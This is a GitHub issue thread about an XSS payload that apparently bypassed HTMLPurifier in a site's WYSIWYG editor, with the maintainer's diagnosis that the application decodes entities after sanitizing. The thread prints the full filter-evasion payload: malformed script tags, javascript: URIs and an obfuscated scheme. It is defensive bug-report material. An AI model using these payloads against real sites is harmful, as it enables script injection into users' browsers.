### ISSUE TITLE
HTMLPurifier fails for this payload

### ISSUE THREAD

**Issue by arpan03** [ezyang/htmlpurifier#111]
Encoded:
`%3Cp%3E<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))/><<SCRIPT>alert("XSS");//<</SCRIPT><IMG """><SCRIPT>alert("XSS")</SCRIPT>script>alert("Ahh, once again bypassed your system, sorry :( *evil laugh*");<<SCRIPT>alert("XSS");//<</SCRIPT><IMG """><SCRIPT>alert("XSS")</SCRIPT>/script><img SRC="jav%26#x09;ascript:alert('XSS');" style="height:512px;width:512px;" alt="human_head_reference_picture_front%20-%20Copy.jpg" />%3Cimg+onerror=%22sfs%22+aalt%3D%22%22+src%3D%22http%3A%2F%2F{siteURL}.com%2Fassets%2Fimages%2Fhuman_head_reference_picture_front%2520-%2520Copy.jpg%22+style%3D%22height%3A512px%3B+width%3A512px%22+%2F%3E%3C%2Fp%3E%0D%0A%0D%0A
`

Decoded:
`<p><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))/><<SCRIPT>alert("XSS");//<</SCRIPT><IMG """><SCRIPT>alert("XSS")</SCRIPT>script>alert("Ahh, once again bypassed your system, sorry :( *evil laugh*");<<SCRIPT>alert("XSS");//<</SCRIPT><IMG """><SCRIPT>alert("XSS")</SCRIPT>/script><img SRC="jav	ascript:alert('XSS');" style="height:512px;width:512px;" alt="human_head_reference_picture_front - Copy.jpg" /><img onerror="sfs" aalt="" src="http://{siteURL}.com/assets/images/human_head_reference_picture_front%20-%20Copy.jpg" style="height:512px; width:512px" /></p>`

**Comment by ezyang** [comment]
What browser? Based on what I see gets output, the crux of the matter is likely to be `jav%26#x09;ascript:alert('XSS');`, which HTML Purifier doesn't think is a javascript URI scheme.

**Comment by arpan03** [comment]
The hacker who is helping us identify the vulnerabilities entered this in a WYSIWYG editor area on the website where we allow user to enter text and format it.

Purifier is returning this as clean html

`%3Cp%3E&lt;script&gt;alert("Ahh, once again bypassed your system, sorry :( *evil laugh*");&lt;/script&gt;<img src="jav%26#x09;ascript:alert('XSS');" style="height:512px;width:512px;" alt="human_head_reference_picture_front%20-%20Copy.jpg" />%3Cimg+onerror=%22sfs%22+aalt%3D%22%22+src%3D%22http%3A%2F%2Ffeeds.specificfeeds.com%2Fassets%2Fimages%2Fhuman_head_reference_picture_front%2520-%2520Copy.jpg%22+style%3D%22height%3A512px%3B+width%3A512px%22+%2F%3E%3C%2Fp%3E%0D%0A%0D%0A`

**Comment by ezyang** [comment]
So if I understand correctly, in this example you are passing HTML Purifier a percent encoded string, which it purifies, and then subsequently the WYSIWYG editor is decoding the percent signs? HTML Purifier was never intended to be used on strings which would be subsequently percent decoded. If that's what you want, you should first percent decode the input, pass it through HTML Purifier, and then percent encode it again (but maybe try to figure out why the data is arriving in percent encoded form)?

**Comment by arpan03** [comment]
No actually user is passing decoded payload

`<p><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))/><<SCRIPT>alert("XSS");//<</SCRIPT><IMG """><SCRIPT>alert("XSS")</SCRIPT>script>alert("Ahh, once again bypassed your system, sorry :( *evil laugh*");<<SCRIPT>alert("XSS");//<</SCRIPT><IMG """><SCRIPT>alert("XSS")</SCRIPT>/script><img SRC="jav ascript:alert('XSS');" style="height:512px;width:512px;" alt="human_head_reference_picture_front - Copy.jpg" /><img onerror="sfs" aalt="" src="http://{siteURL}.com/assets/images/human_head_reference_picture_front%20-%20Copy.jpg" style="height:512px; width:512px" /></p>`

Which we pass to HTMLPurifier before encoding it and storing it in the db. 

HTMLPurifier cleans it up partially to this:

`<p><script>alert("Ahh, once again bypassed your system, sorry :( *evil laugh*");</script><img src="jav ascript:alert('XSS');" style="height:512px;width:512px;" alt="human_head_reference_picture_front - Copy.jpg" /><img onerror="sfs" aalt="" src="http://{siteURL}.com/assets/images/human_head_reference_picture_front%20-%20Copy.jpg" style="height:512px; width:512px" /></p>`

**Comment by ezyang** [comment]
When I pass the input <a href="http://htmlpurifier.org/demo.php?filter%5BAutoFormat.AutoParagraph%5D=0&filter%5BAutoFormat.DisplayLinkURI%5D=0&filter%5BAutoFormat.Linkify%5D=0&filter%5BAutoFormat.RemoveEmpty.Predicate%5D=colgroup%3A%0D%0Ath%3A%0D%0Atd%3A%0D%0Aiframe%3Asrc%0D%0A&filter%5BAutoFormat.RemoveEmpty%5D=0&filter%5BAutoFormat.RemoveSpansWithoutAttributes%5D=0&filter%5BNull_CSS.AllowedProperties%5D=1&filter%5BCore.CollectErrors%5D=0&filter%5BNull_HTML.Allowed%5D=1&filter%5BNull_HTML.Doctype%5D=1&filter%5BHTML.SafeObject%5D=0&filter%5BHTML.TidyLevel%5D=medium&filter%5BURI.DisableExternalResources%5D=0&filter%5BNull_URI.Munge%5D=1&html=%3Cp%3E%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%3E%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3Escript%3Ealert%28%22Ahh%2C+once+again+bypassed+your+system%2C+sorry+%3A%28+*evil+laugh*%22%29%3B%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%2Fscript%3E%3Cimg+SRC%3D%22jav+ascript%3Aalert%28%27XSS%27%29%3B%22+style%3D%22height%3A512px%3Bwidth%3A512px%3B%22+alt%3D%22human_head_reference_picture_front+-+Copy.jpg%22+%2F%3E%3Cimg+onerror%3D%22sfs%22+aalt%3D%22%22+src%3D%22http%3A%2F%2F%7BsiteURL%7D.com%2Fassets%2Fimages%2Fhuman_head_reference_picture_front%2520-%2520Copy.jpg%22+style%3D%22height%3A512px%3B+width%3A512px%22+%2F%3E%3C%2Fp%3E&submit=Submit">here</a>, I see the script tag is converted into &amp;lt; references. Could you perhaps submit a self-contained script which: (1) feeds the input to HTML Purifier, (2) prints it out, such that when I navigate to it in a browser, I see an alert()?

**Comment by arpan03** [comment]
Our default encoding is UTF-8 so the stored data is encoded. To show that data properly on the front-end we decode this data before showing it to user and that's where this alert gets kicked in I think.

What do you think?

**Comment by ezyang** [comment]
So, you are doing an html entities decode? That can't possibly be the right thing to do; how are people going to display a literal <?
